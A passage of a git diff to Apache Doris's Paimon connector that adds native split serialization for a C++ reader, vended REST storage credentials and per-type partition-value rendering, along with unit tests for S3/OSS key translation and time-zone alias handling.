Session variable name (byte-identical to SessionVariable.ENABLE_PAIMON_CPP_READER) surfaced + // through ConnectorSession.getSessionProperties() (VariableMgr.toMap). When true, BE routes the + // JNI-format paimon split to PaimonCppReader, which deserializes the NATIVE paimon binary format + // (paimon::Split::Deserialize), so FE must serialize a DataSplit with that format, not Java serde. + private static final String ENABLE_PAIMON_CPP_READER = "enable_paimon_cpp_reader"; + private final Map properties; private final PaimonCatalogOps catalogOps; + private final ConnectorContext context; public PaimonScanPlanProvider(Map properties, PaimonCatalogOps catalogOps) { + this(properties, catalogOps, null); + } + + public PaimonScanPlanProvider(Map properties, PaimonCatalogOps catalogOps, + ConnectorContext context) { this.properties = properties; this.catalogOps = catalogOps; + this.context = context; + } + + /** + * Reads the {@code enable_paimon_cpp_reader} session flag from the SPI session properties + * (forwarded by the engine via {@code VariableMgr.toMap}). Default false (legacy default), so + * normal reads are unaffected. Package-private static for offline unit testing. + */ + static boolean isCppReaderEnabled(ConnectorSession session) { + if (session == null) { + return false; + } + return Boolean.parseBoolean(session.getSessionProperties().get(ENABLE_PAIMON_CPP_READER)); } /** @@ -203,16 +241,19 @@ public List planScan( List ranges = new ArrayList<>(); + // Read the cpp-reader flag once: it selects the JNI split serialization format (see encodeSplit). + boolean cppReader = isCppReaderEnabled(session); + // Non-DataSplit → always JNI for (Split split : nonDataSplits) { ranges.add(buildJniScanRange(split, tableLocation, defaultFileFormat, - Collections.emptyMap(), false)); + Collections.emptyMap(), false, cppReader)); } // Process DataSplits for (DataSplit dataSplit : dataSplits) { Map partitionValues = getPartitionInfoMap( - table, dataSplit.partition()); + table, dataSplit.partition(), session.getTimeZone()); Optional> optRawFiles = dataSplit.convertToRawFiles(); Optional> optDeletionFiles = dataSplit.deletionFiles(); @@ -247,7 +288,7 @@ public List planScan( // JNI reader path ranges.add(buildJniScanRange( dataSplit, tableLocation, defaultFileFormat, - partitionValues, true)); + partitionValues, true, cppReader)); } } @@ -303,7 +344,7 @@ public Map getScanNodeProperties( props.put("paimon.options_json", sb.toString()); } - // Location / storage properties + // Location / storage properties (static catalog-level keys) for (Map.Entry entry : properties.entrySet()) { String key = entry.getKey(); if (key.startsWith("hadoop.") || key.startsWith("fs.") @@ -314,12 +355,44 @@ public Map getScanNodeProperties( } } + // FIX-REST-VENDED: overlay per-table vended cloud-storage credentials (REST catalogs). + // The raw token is extracted from the live, snapshot-pinned table's RESTTokenFileIO (paimon + // SDK only), then normalized to BE-facing AWS_* keys by the engine (the connector cannot + // import fe-core's StorageProperties). Vended overlays static (legacy precedence). Skipped + // when no context (offline unit tests) or the table is non-REST (empty token -> no-op). + if (context != null) { + Map vendedBeProps = context.vendStorageCredentials(extractVendedToken(table)); + for (Map.Entry e : vendedBeProps.entrySet()) { + props.put("location." + e.getKey(), e.getValue()); + } + } + return props; } + /** + * Extracts the raw per-table vended credential token from a REST catalog table's + * {@link RESTTokenFileIO} (port of legacy {@code PaimonVendedCredentialsProvider + * .extractRawVendedCredentials}, paimon SDK only). Returns empty for a non-REST table (different + * FileIO) or when no valid token is available — the gate is the table's FileIO type, equivalent + * to legacy's "metastore is REST" check for the read path. + */ + static Map extractVendedToken(Table table) { + if (table == null) { + return Collections.emptyMap(); + } + FileIO fileIO = table.fileIO(); + if (!(fileIO instanceof RESTTokenFileIO)) { + return Collections.emptyMap(); + } + RESTToken token = ((RESTTokenFileIO) fileIO).validToken(); + Map raw = token == null ? null : token.token(); + return raw == null ? Collections.emptyMap() : new HashMap<>(raw); + } + private PaimonScanRange buildJniScanRange(Split split, String tableLocation, String defaultFileFormat, Map partitionValues, - boolean isDataSplit) { + boolean isDataSplit, boolean cppReader) { long splitWeight = 0; if (isDataSplit) { splitWeight = computeSplitWeight((DataSplit) split); @@ -327,7 +400,7 @@ private PaimonScanRange buildJniScanRange(Split split, String tableLocation, splitWeight = split.rowCount(); } - String serializedSplit = encodeObjectToString(split); + String serializedSplit = encodeSplit(split, cppReader); return new PaimonScanRange.Builder() .fileFormat("jni") @@ -380,7 +453,7 @@ private static boolean supportNativeReader(Optional> optRawFiles) return true; } - private Map getPartitionInfoMap(Table table, BinaryRow partitionValue) { + private Map getPartitionInfoMap(Table table, BinaryRow partitionValue, String timeZone) { List partitionKeys = table.partitionKeys(); if (partitionKeys == null || partitionKeys.isEmpty()) { return Collections.emptyMap(); @@ -392,13 +465,80 @@ private Map getPartitionInfoMap(Table table, BinaryRow partition Map result = new LinkedHashMap<>(); for (int i = 0; i < partitionKeys.size(); i++) { - String key = partitionKeys.get(i); - String value = values[i] != null ? values[i].toString() : null; - result.put(key, value); + try { + String value = serializePartitionValue( + partitionType.getFields().get(i).type(), values[i], timeZone); + result.put(partitionKeys.get(i).toLowerCase(Locale.ROOT), value); + } catch (UnsupportedOperationException e) { + // Legacy parity (PaimonUtil.getPartitionInfoMap): an unsupported partition column + // type (e.g. binary/varbinary) drops the ENTIRE map — BE then materializes no + // columnsFromPath for this split, rather than emitting non-deterministic [B@hash + // garbage. Legacy returned null; the connector returns an empty map, which + // PaimonScanRange.populateRangeParams treats identically (no columnsFromPath emitted). + LOG.warn("Failed to serialize partition value for key {} of table {}: {}", + partitionKeys.get(i), table.name(), e.getMessage()); + return Collections.emptyMap(); + } } return result; } + /** + * Renders one Paimon partition value to the canonical string BE expects in columnsFromPath. + * Byte-faithful port of legacy PaimonUtil.serializePartitionValue. Pure static (no Table / + * ReadBuilder needed) so the correctness-critical per-type rendering is unit-testable offline. + * Only TIMESTAMP_WITH_LOCAL_TIME_ZONE consumes {@code timeZone} (session zone, UTC->session + * shift); all other cases ignore it. + * + *

      For native ORC/Parquet reads, partition columns are NOT stored in the data files — BE + * materializes them from this string. A raw {@code Object.toString()} corrupts several types: + * DATE renders as epoch-days ("19723"), LTZ keeps the un-shifted UTC wall clock, BINARY becomes + * a JVM-identity {@code [B@hash}. This per-type switch restores legacy correctness. + */ + static String serializePartitionValue(DataType type, Object value, String timeZone) { + switch (type.getTypeRoot()) { + case BOOLEAN: + case INTEGER: + case BIGINT: + case SMALLINT: + case TINYINT: + case DECIMAL: + case VARCHAR: + case CHAR: + return value == null ? null : value.toString(); + case FLOAT: + return value == null ? null : Float.toString((Float) value); + case DOUBLE: + return value == null ? null : Double.toString((Double) value); + // BINARY / VARBINARY intentionally unsupported (falls to default -> throws -> map + // dropped): a utf8 string render can corrupt the bytes (legacy comment). + case DATE: + return value == null ? null + : LocalDate.ofEpochDay((Integer) value).format(DateTimeFormatter.ISO_LOCAL_DATE); + case TIME_WITHOUT_TIME_ZONE: + if (value == null) { + return null; + } + return LocalTime.ofNanoOfDay(((Long) value) * 1000) + .format(DateTimeFormatter.ISO_LOCAL_TIME); + case TIMESTAMP_WITHOUT_TIME_ZONE: + return value == null ? null + : ((Timestamp) value).toLocalDateTime().format(DateTimeFormatter.ISO_LOCAL_DATE_TIME); + case TIMESTAMP_WITH_LOCAL_TIME_ZONE: + if (value == null) { + return null; + } + return ((Timestamp) value).toLocalDateTime() + .atZone(ZoneId.of("UTC")) + .withZoneSameInstant(ZoneId.of(timeZone)) + .toLocalDateTime() + .format(DateTimeFormatter.ISO_LOCAL_DATE_TIME); + default: + throw new UnsupportedOperationException( + "Unsupported type for serializePartitionValue: " + type); + } + } + private String getTableLocation(Table table) { if (table instanceof FileStoreTable) { return ((FileStoreTable) table).location().toString(); @@ -462,6 +602,30 @@ public String getSerializedTable(Map properties) { return properties.get("paimon.serialized_table"); } + /** + * Selects the split serialization that matches the BE reader the engine will use. + * When the paimon-cpp reader is enabled AND the split is a {@link DataSplit}, serialize with + * Paimon's NATIVE binary format ({@code DataSplit.serialize}) so BE's PaimonCppReader + * ({@code paimon::Split::Deserialize}) can decode it. Otherwise (flag off, or a non-DataSplit + * system split / no-raw-file fallback that has no native format) fall back to Java object + * serialization for the Java JNI reader. Mirrors legacy PaimonScanNode.setPaimonParams + + * PaimonUtil.encodeDataSplitToString; the {@code instanceof DataSplit} guard is load-bearing + * parity (non-DataSplit splits MUST stay Java-serialized even when the flag is on). + */ + static String encodeSplit(Split split, boolean cppReader) { + if (cppReader && split instanceof DataSplit) { + try { + ByteArrayOutputStream baos = new ByteArrayOutputStream(); + ((DataSplit) split).serialize(new DataOutputViewStreamWrapper(baos)); + return new String(BASE64_ENCODER.encode(baos.toByteArray()), StandardCharsets.UTF_8); + } catch (Exception e) { + throw new RuntimeException("Failed to serialize Paimon DataSplit (native format): " + + e.getMessage(), e); + } + } + return encodeObjectToString(split); + } + @SuppressWarnings("unchecked") private static String encodeObjectToString(T obj) { try { diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/FakePaimonTable.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/FakePaimonTable.java index 69ec7bf0415870..382bd1f530ad32 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/FakePaimonTable.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/FakePaimonTable.java @@ -68,6 +68,8 @@ final class FakePaimonTable implements Table { Map lastCopyOptions; /** The table returned by {@link #copy(Map)}; defaults to {@code this} when unset. */ Table copyResult; + /** The FileIO returned by {@link #fileIO()}; {@code null} (the legacy throw) unless set. */ + FileIO fileIO; FakePaimonTable(String name, RowType rowType, List partitionKeys, List primaryKeys) { @@ -121,7 +123,9 @@ public Optional statistics() { @Override public FileIO fileIO() { - throw new UnsupportedOperationException(); + // Settable so FIX-REST-VENDED tests can inject a non-REST FileIO double (the positive + // RESTTokenFileIO path needs a live REST stack, covered by the fe-core bridge test + E2E). + return fileIO; } @Override diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonCatalogFactoryTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonCatalogFactoryTest.java index 2748cb4539275d..7f647d8f53d410 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonCatalogFactoryTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonCatalogFactoryTest.java @@ -563,4 +563,206 @@ public void buildDlfHiveConfThrowsWhenEndpointAndRegionBlank() { "dlf.catalog.uid", "uid-1"))); Assertions.assertTrue(ex.getMessage().contains("dlf.endpoint")); } + + // --------------------------------------------------------------------- + // FIX-STORAGE-CREDS — canonical s3.*/oss.*/AWS_* alias translation + // (ported legacy appendS3HdfsProperties + OSSProperties.initializeHadoopStorageConfig) + // --------------------------------------------------------------------- + + @Test + public void buildHadoopConfigurationTranslatesCanonicalS3Credentials() { + Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration(props( + "s3.access_key", "ak", + "s3.secret_key", "sk", + "s3.endpoint", "s3.ap-east-1.amazonaws.com")); + + // WHY (BLOCKER, Finding 9.1): a filesystem catalog created with the DOCUMENTED canonical + // keys (the same ones test_paimon_s3.groovy passes) must reach the S3 FileIO with real + // credentials. Before the fix applyStorageConfig recognized only paimon.*/raw fs.* keys, so + // s3.access_key/s3.secret_key/s3.endpoint were SILENTLY DROPPED and the Paimon FileSystem + // catalog hit S3 anonymously -> access-denied at plan time. MUTATION: dropping the canonical + // s3.* translation (today's behavior) leaves fs.s3a.access.key null -> red. + Assertions.assertEquals("ak", conf.get("fs.s3a.access.key")); + Assertions.assertEquals("sk", conf.get("fs.s3a.secret.key")); + Assertions.assertEquals("s3.ap-east-1.amazonaws.com", conf.get("fs.s3a.endpoint")); + Assertions.assertEquals("org.apache.hadoop.fs.s3a.SimpleAWSCredentialsProvider", + conf.get("fs.s3a.aws.credentials.provider")); + Assertions.assertEquals("org.apache.hadoop.fs.s3a.S3AFileSystem", conf.get("fs.s3a.impl")); + Assertions.assertEquals("true", conf.get("fs.s3.impl.disable.cache")); + } + + @Test + public void buildHadoopConfigurationTranslatesAwsEnvAliases() { + Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration(props( + "AWS_ACCESS_KEY", "ak", + "AWS_SECRET_KEY", "sk", + "AWS_TOKEN", "tok", + "AWS_ENDPOINT", "s3.amazonaws.com", + "AWS_REGION", "us-east-1")); + + // WHY: legacy accepted the AWS_* alias family (S3Properties @ConnectorProperty names). This + // verifies the alias priority list resolves them (not just the primary s3.* key), including + // the session token and endpoint region. MUTATION: dropping any AWS_* alias -> red. + Assertions.assertEquals("ak", conf.get("fs.s3a.access.key")); + Assertions.assertEquals("sk", conf.get("fs.s3a.secret.key")); + Assertions.assertEquals("tok", conf.get("fs.s3a.session.token")); + Assertions.assertEquals("s3.amazonaws.com", conf.get("fs.s3a.endpoint")); + Assertions.assertEquals("us-east-1", conf.get("fs.s3a.endpoint.region")); + } + + @Test + public void buildHadoopConfigurationDoesNotEmitCredsProviderForAnonymousBucket() { + Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration(props( + "s3.endpoint", "s3.amazonaws.com", + "s3.region", "us-east-1")); + + // WHY (parity): legacy guards the credentials provider + access/secret keys behind + // isNotBlank(accessKey), so a public/anonymous bucket (endpoint/region but no keys) still + // gets fs.s3.impl + endpoint but is NOT forced onto our single SimpleAWSCredentialsProvider + // override (which would break the env/IAM fallback chain). access.key has no Hadoop default + // so it stays null; the provider key DOES have a Hadoop default chain, so the meaningful + // check is that we did not override it to Simple-only. MUTATION: emitting the provider or a + // blank access key unconditionally -> red (would force credentialed auth on a public bucket). + Assertions.assertEquals("s3.amazonaws.com", conf.get("fs.s3a.endpoint")); + Assertions.assertEquals("us-east-1", conf.get("fs.s3a.endpoint.region")); + Assertions.assertEquals("org.apache.hadoop.fs.s3a.S3AFileSystem", conf.get("fs.s3a.impl")); + Assertions.assertNull(conf.get("fs.s3a.access.key")); + Assertions.assertNotEquals("org.apache.hadoop.fs.s3a.SimpleAWSCredentialsProvider", + conf.get("fs.s3a.aws.credentials.provider"), + "anonymous bucket must not be forced onto our Simple-only credentials provider"); + } + + @Test + public void buildHadoopConfigurationExplicitFsS3aKeyOverridesCanonical() { + Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration(props( + "s3.access_key", "canon", + "fs.s3a.access.key", "explicit")); + + // WHY: the raw fs.* passthrough runs AFTER the canonical translation (last-write-wins = + // legacy addResource(getHadoopStorageConfig) THEN appendUserHadoopConfig ordering), so a + // power user who explicitly set fs.s3a.access.key still wins over the canonical alias. + // MUTATION: a refactor that reverses precedence (canonical overlays raw) -> "canon" -> red. + Assertions.assertEquals("explicit", conf.get("fs.s3a.access.key")); + } + + @Test + public void buildDlfHiveConfTranslatesCanonicalOssCredentials() { + HiveConf hc = PaimonCatalogFactory.buildDlfHiveConf(props( + "dlf.access_key", "dak", + "dlf.secret_key", "dsk", + "dlf.endpoint", "dlf.cn-hangzhou.aliyuncs.com", + "dlf.region", "cn-hangzhou", + "oss.access_key", "oak", + "oss.secret_key", "osk", + "oss.endpoint", "oss-cn-hangzhou.aliyuncs.com", + "oss.region", "cn-hangzhou")); + + // WHY (BLOCKER, Finding 9.2): the DLF gate passes when an oss.* key is present, but before + // the fix buildDlfHiveConf overlaid storage only through the old applyStorageConfig, which + // dropped the canonical oss.access_key/oss.secret_key/oss.endpoint/oss.region -> the HiveConf + // carried NO usable OSS FileIO config -> DLF/HMS catalog could not read OSS data files. The + // dlf.catalog.* metastore keys must still be present AND the OSS (Jindo) storage keys set. + // MUTATION: dropping the canonical OSS translation leaves fs.oss.accessKeyId null -> red. + Assertions.assertEquals("dak", hc.get("dlf.catalog.accessKeyId")); + Assertions.assertEquals("dlf.cn-hangzhou.aliyuncs.com", hc.get("dlf.catalog.endpoint")); + Assertions.assertEquals("oak", hc.get("fs.oss.accessKeyId")); + Assertions.assertEquals("osk", hc.get("fs.oss.accessKeySecret")); + Assertions.assertEquals("oss-cn-hangzhou.aliyuncs.com", hc.get("fs.oss.endpoint")); + Assertions.assertEquals("cn-hangzhou", hc.get("fs.oss.region")); + Assertions.assertEquals("com.aliyun.jindodata.oss.JindoOssFileSystem", hc.get("fs.oss.impl")); + } + + @Test + public void requireOssStorageForDlfThenBuildDlfHiveConfYieldsOssCreds() { + Map p = props( + "dlf.access_key", "dak", + "dlf.secret_key", "dsk", + "dlf.endpoint", "dlf.cn-hangzhou.aliyuncs.com", + "oss.access_key", "oak", + "oss.secret_key", "osk", + "oss.endpoint", "oss-cn-hangzhou.aliyuncs.com"); + + // WHY (BLOCKER end-to-end): the gate and the storage translation must agree on the SAME key + // set. With canonical oss.* only (no paimon.fs.oss.*), the gate must pass AND the resulting + // HiveConf must carry usable OSS credentials. Before the fix the gate passed but the conf had + // no creds. MUTATION: gate/translation disagreeing on the oss.* key set -> red. + Assertions.assertDoesNotThrow(() -> PaimonCatalogFactory.requireOssStorageForDlf(p)); + Assertions.assertEquals("oak", PaimonCatalogFactory.buildDlfHiveConf(p).get("fs.oss.accessKeyId")); + } + + @Test + public void buildDlfHiveConfDerivesOssEndpointFromRegion() { + HiveConf vpc = PaimonCatalogFactory.buildDlfHiveConf(props( + "dlf.access_key", "dak", + "dlf.secret_key", "dsk", + "dlf.endpoint", "dlf.cn-hangzhou.aliyuncs.com", + "oss.region", "cn-hangzhou")); + + // WHY (DLF parity, Finding 9.2 completeness): DLF users typically pass a region, not an + // explicit oss.endpoint. Legacy derived the OSS endpoint from the region via + // OSSProperties.getOssEndpoint(region, accessPublic); the DEFAULT (non-public) is the + // -internal endpoint. MUTATION: not deriving (fs.oss.endpoint null) or using the public form + // by default -> red. + Assertions.assertEquals("oss-cn-hangzhou-internal.aliyuncs.com", vpc.get("fs.oss.endpoint")); + + HiveConf pub = PaimonCatalogFactory.buildDlfHiveConf(props( + "dlf.access_key", "dak", + "dlf.secret_key", "dsk", + "dlf.endpoint", "dlf.cn-hangzhou.aliyuncs.com", + "oss.region", "cn-hangzhou", + "dlf.access.public", "true")); + + // WHY: when access is public the endpoint has no -internal suffix. MUTATION: ignoring + // accessPublic -> red. + Assertions.assertEquals("oss-cn-hangzhou.aliyuncs.com", pub.get("fs.oss.endpoint")); + } + + // --------------------------------------------------------------------- + // FIX-HMS-CONFRES — buildHmsHiveConf(props, hiveConfResources) base-merge + // --------------------------------------------------------------------- + + @Test + public void buildHmsHiveConfOverlaysResolvedHiveConfResourcesAsBase() { + Map fileKeys = new HashMap<>(); + fileKeys.put("hive.metastore.sasl.qop", "auth-conf"); + fileKeys.put("hive.metastore.thrift.transport", "custom"); + HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf( + props("uri", "thrift://nn:9083"), fileKeys); + + // WHY (MAJOR, Finding §8): connection-critical keys present ONLY in the external hive-site.xml + // (hive.conf.resources) must reach the catalog HiveConf — before the fix buildHmsHiveConf + // built the conf from the raw prop map only and dropped the file entirely. MUTATION: dropping + // the file-keys base merge (today's behavior) -> these keys absent -> red. + Assertions.assertEquals("auth-conf", hc.get("hive.metastore.sasl.qop")); + Assertions.assertEquals("custom", hc.get("hive.metastore.thrift.transport")); + Assertions.assertEquals("thrift://nn:9083", hc.get("hive.metastore.uris")); + } + + @Test + public void buildHmsHiveConfUserHivePropOverridesFileResource() { + // A non-uri hive.* key avoids the separate uri-alias resolution (HMS_URI), isolating the + // file-base vs user-hive.* precedence under test. + Map fileKeys = new HashMap<>(); + fileKeys.put("hive.metastore.sasl.qop", "FILE-qop"); + HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf(props( + "uri", "thrift://nn:9083", + "hive.metastore.sasl.qop", "USER-qop"), fileKeys); + + // WHY: legacy precedence is file=base, user hive.* WINS. This can only pass if the file map is + // applied FIRST (as the base), then overridden by the verbatim user hive.* copy. MUTATION: + // applying the file map AFTER the user keys -> the file value "FILE-qop" wins -> red. + Assertions.assertEquals("USER-qop", hc.get("hive.metastore.sasl.qop"), + "a user hive.* prop must override the same key from the file base"); + } + + @Test + public void buildHmsHiveConfSingleArgUsesEmptyResources() { + HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf(props("uri", "thrift://nn:9083")); + + // WHY: the back-compat 1-arg overload must behave exactly as before (empty file resources), + // so all existing callers/tests are unaffected. MUTATION: the 1-arg overload diverging from + // the 2-arg-with-empty-map -> red. + Assertions.assertEquals("thrift://nn:9083", hc.get("hive.metastore.uris")); + Assertions.assertEquals("10", hc.get("hive.metastore.client.socket.timeout")); + } } diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataMvccTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataMvccTest.java index 8826745934a2b3..a094d53a8bb840 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataMvccTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataMvccTest.java @@ -302,29 +302,88 @@ public void resolveTimestampStringParsedWithSessionTimeZone() { } @Test - public void resolveTimestampStringWithUnsupportedZoneAliasThrowsClearError() { + public void resolveTimestampStringWithGenuinelyUnknownZoneFailsLoud() { RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); PaimonTableHandle handle = normalHandle(ops); - // WHY (parity landmine): Doris accepts session zone aliases like "CST"/"PST"/"EST" that - // java.time.ZoneId.of() REJECTS (ZoneRulesException, a DateTimeException). Legacy resolved - // these via the fe-core Doris alias map and succeeded; the connector is import-gated out of - // that map. A SILENT fallback (e.g. UTC) would resolve the WRONG snapshot -> silently wrong - // rows, so the connector must FAIL LOUD with an actionable error instead. - // MUTATION: removing the catch -> a raw ZoneRulesException propagates (assertThrows on the - // wrong type) red; degrading to UTC instead of throwing -> assertThrows finds no exception red. + // WHY (FIX-TZ-ALIAS, no-silent-degrade invariant): after the fix the connector replicates the + // legacy alias map (SHORT_IDS + 4 Doris overrides), so CST/PST/EST now RESOLVE (see the two + // tests below). But an id absent from BOTH ZoneId.of's native set AND the alias map (e.g. + // "XYZ") must still FAIL LOUD — never silently degrade to a wrong zone (a wrong zone resolves + // the WRONG snapshot -> silently wrong rows). The fix only NARROWS the failure set to + // genuinely-unknown ids; it must not become a silent UTC fallback. + // MUTATION: catching and degrading to UTC -> assertThrows finds no exception -> red; + // a raw DateTimeException leaking (no DorisConnectorException wrap) -> wrong type -> red. DorisConnectorException ex = Assertions.assertThrows(DorisConnectorException.class, - () -> metadataWith(ops).resolveTimeTravel(new TzSession("CST"), handle, + () -> metadataWith(ops).resolveTimeTravel(new TzSession("XYZ"), handle, ConnectorTimeTravelSpec.timestamp("2023-01-01 00:00:00", false)), - "an unsupported Doris zone alias must fail loud, not crash with a raw " - + "ZoneRulesException nor silently degrade to a wrong zone"); - Assertions.assertTrue(ex.getMessage().contains("CST"), - "the error must name the offending session zone alias ('CST')"); + "a genuinely-unknown zone id must fail loud, not crash with a raw " + + "DateTimeException nor silently degrade to a wrong zone"); + Assertions.assertTrue(ex.getMessage().contains("XYZ"), + "the error must name the offending session zone id ('XYZ')"); Assertions.assertTrue(ex.getMessage().contains("standard") && ex.getMessage().contains("zone id"), "the error must give actionable guidance (use a standard zone id)"); } + @Test + public void resolveTimestampStringResolvesCstAliasToShanghai() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + PaimonTableHandle handle = normalHandle(ops); + ops.snapshotIdAtOrBefore = OptionalLong.of(8L); + + String literal = "2023-11-15 00:00:00"; + long expectedShanghai = DateTimeUtils.parseTimestampData(literal, 3, + TimeZone.getTimeZone("Asia/Shanghai")).getMillisecond(); + long expectedUtc = DateTimeUtils.parseTimestampData(literal, 3, + TimeZone.getTimeZone("UTC")).getMillisecond(); + Assertions.assertNotEquals(expectedShanghai, expectedUtc, + "test precondition: the literal must resolve to different millis in CST vs UTC"); + + metadataWith(ops).resolveTimeTravel(new TzSession("CST"), handle, + ConnectorTimeTravelSpec.timestamp(literal, false)); + + // WHY (FIX-TZ-ALIAS): CST is Doris's DEFAULT region alias for Asia/Shanghai; legacy resolved + // it via the alias map (the 4 overrides put CST -> Asia/Shanghai). Pinning the *Shanghai* + // millis (not UTC, not a throw) is the byte-parity intent. Before the fix the alias-less + // ZoneId.of threw -> FOR TIME AS OF a datetime string was broken under the DEFAULT time zone. + // MUTATION: alias-less ZoneId.of -> throws (red); a wrong override (CST->UTC) -> captures + // expectedUtc (red). + Assertions.assertEquals(expectedShanghai, ops.snapshotIdAtOrBeforeArg, + "CST must resolve to Asia/Shanghai (Doris default alias), matching legacy"); + } + + @Test + public void resolveTimestampStringResolvesPstAndEstViaShortIds() { + String literal = "2023-11-15 00:00:00"; + + // PST resolves through ZoneId.SHORT_IDS -> America/Los_Angeles (NOT one of the 4 explicit + // Doris overrides). This is the report-suggestion correction: a fix that inlined only the 4 + // entries would leave PST/EST THROWING. The full SHORT_IDS map is required. + RecordingPaimonCatalogOps pstOps = new RecordingPaimonCatalogOps(); + pstOps.snapshotIdAtOrBefore = OptionalLong.of(3L); + long expectedPst = DateTimeUtils.parseTimestampData(literal, 3, + TimeZone.getTimeZone("America/Los_Angeles")).getMillisecond(); + metadataWith(pstOps).resolveTimeTravel(new TzSession("PST"), normalHandle(pstOps), + ConnectorTimeTravelSpec.timestamp(literal, false)); + // WHY: PST must resolve via SHORT_IDS to America/Los_Angeles. MUTATION: dropping + // putAll(ZoneId.SHORT_IDS) -> PST throws -> red. + Assertions.assertEquals(expectedPst, pstOps.snapshotIdAtOrBeforeArg, + "PST must resolve via ZoneId.SHORT_IDS to America/Los_Angeles, matching legacy"); + + // EST resolves through ZoneId.SHORT_IDS -> the fixed offset "-05:00". + RecordingPaimonCatalogOps estOps = new RecordingPaimonCatalogOps(); + estOps.snapshotIdAtOrBefore = OptionalLong.of(4L); + long expectedEst = DateTimeUtils.parseTimestampData(literal, 3, + TimeZone.getTimeZone(java.time.ZoneId.of("-05:00"))).getMillisecond(); + metadataWith(estOps).resolveTimeTravel(new TzSession("EST"), normalHandle(estOps), + ConnectorTimeTravelSpec.timestamp(literal, false)); + // WHY: EST must resolve via SHORT_IDS to the -05:00 offset. MUTATION: dropping + // putAll(ZoneId.SHORT_IDS) -> EST throws -> red. + Assertions.assertEquals(expectedEst, estOps.snapshotIdAtOrBeforeArg, + "EST must resolve via ZoneId.SHORT_IDS to the -05:00 offset, matching legacy"); + } + @Test public void resolveTimestampDigitalUnaffectedByUnsupportedZoneAlias() { RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); @@ -332,18 +391,22 @@ public void resolveTimestampDigitalUnaffectedByUnsupportedZoneAlias() { ops.snapshotIdAtOrBefore = OptionalLong.of(11L); // WHY: the zone-id catch must be scoped to the STRING path only. A DIGITAL timestamp is raw - // epoch-millis and never touches ZoneId.of, so it must succeed even under a CST session that - // would reject a datetime string. MUTATION: over-broadening the catch to the whole parse (or - // resolving the zone unconditionally) -> the digital path throws under "CST" -> red. + // epoch-millis and never touches ZoneId.of, so it must succeed even under a session whose + // zone id is GENUINELY unknown (would reject a datetime string). NOTE: this uses "XYZ" (a + // truly-unknown id) deliberately — after FIX-TZ-ALIAS "CST" now resolves, so a CST session + // would no longer prove the bypass (it would parse fine for strings too). "XYZ" still throws + // on the string path, so the test keeps its discriminating power. MUTATION: dropping the + // spec.isDigital() short-circuit -> the digital value goes to parseTimestampData with zone + // "XYZ" -> throws -> red. ConnectorMvccSnapshot snap = metadataWith(ops) - .resolveTimeTravel(new TzSession("CST"), handle, + .resolveTimeTravel(new TzSession("XYZ"), handle, ConnectorTimeTravelSpec.timestamp("1700000000000", true)) .get(); Assertions.assertEquals(1_700_000_000_000L, ops.snapshotIdAtOrBeforeArg, - "a digital timestamp must be fed verbatim even under an unsupported zone alias"); + "a digital timestamp must be fed verbatim even under an unknown zone id"); Assertions.assertEquals(11L, snap.getSnapshotId(), - "the digital timestamp path must resolve normally under a CST session (no zone needed)"); + "the digital timestamp path must resolve normally under an unknown-zone session (no zone needed)"); } @Test diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataPartitionTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataPartitionTest.java index bc56ef65b515a4..ad72f547a00ba0 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataPartitionTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataPartitionTest.java @@ -118,6 +118,36 @@ public void legacyNameTrueRendersDateKeyAndCarriesStats() { Assertions.assertEquals("cn", info.getPartitionValues().get("region")); } + @Test + public void listPartitionsCarriesFileCount() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + FakePaimonTable table = new FakePaimonTable( + "t1", dtRegionRowType(), Arrays.asList("dt", "region"), Collections.emptyList()); + table.setOptions(Collections.singletonMap("partition.legacy-name", "true")); + ops.table = table; + Map spec = new LinkedHashMap<>(); + spec.put("dt", String.valueOf(DT_EPOCH_DAY)); + spec.put("region", "cn"); + // Every stat is a DISTINCT value so an arg-swap mutation cannot pass by coincidence. + // Paimon Partition ctor order: (spec, recordCount, fileSizeInBytes, fileCount, + // lastFileCreationTime, done). + ops.partitions = Collections.singletonList(new Partition( + spec, /*recordCount*/ 42L, /*fileSizeInBytes*/ 1024L, /*fileCount*/ 7L, + /*lastFileCreationTime*/ 1700000000000L, /*done*/ true)); + + ConnectorPartitionInfo info = metadataWith(ops) + .listPartitions(null, dtRegionHandle(table), Optional.empty()).get(0); + + // WHY: the SHOW PARTITIONS FileCount column (D-045) reads ConnectorPartitionInfo.getFileCount(), + // which MUST carry Paimon Partition.fileCount() — the 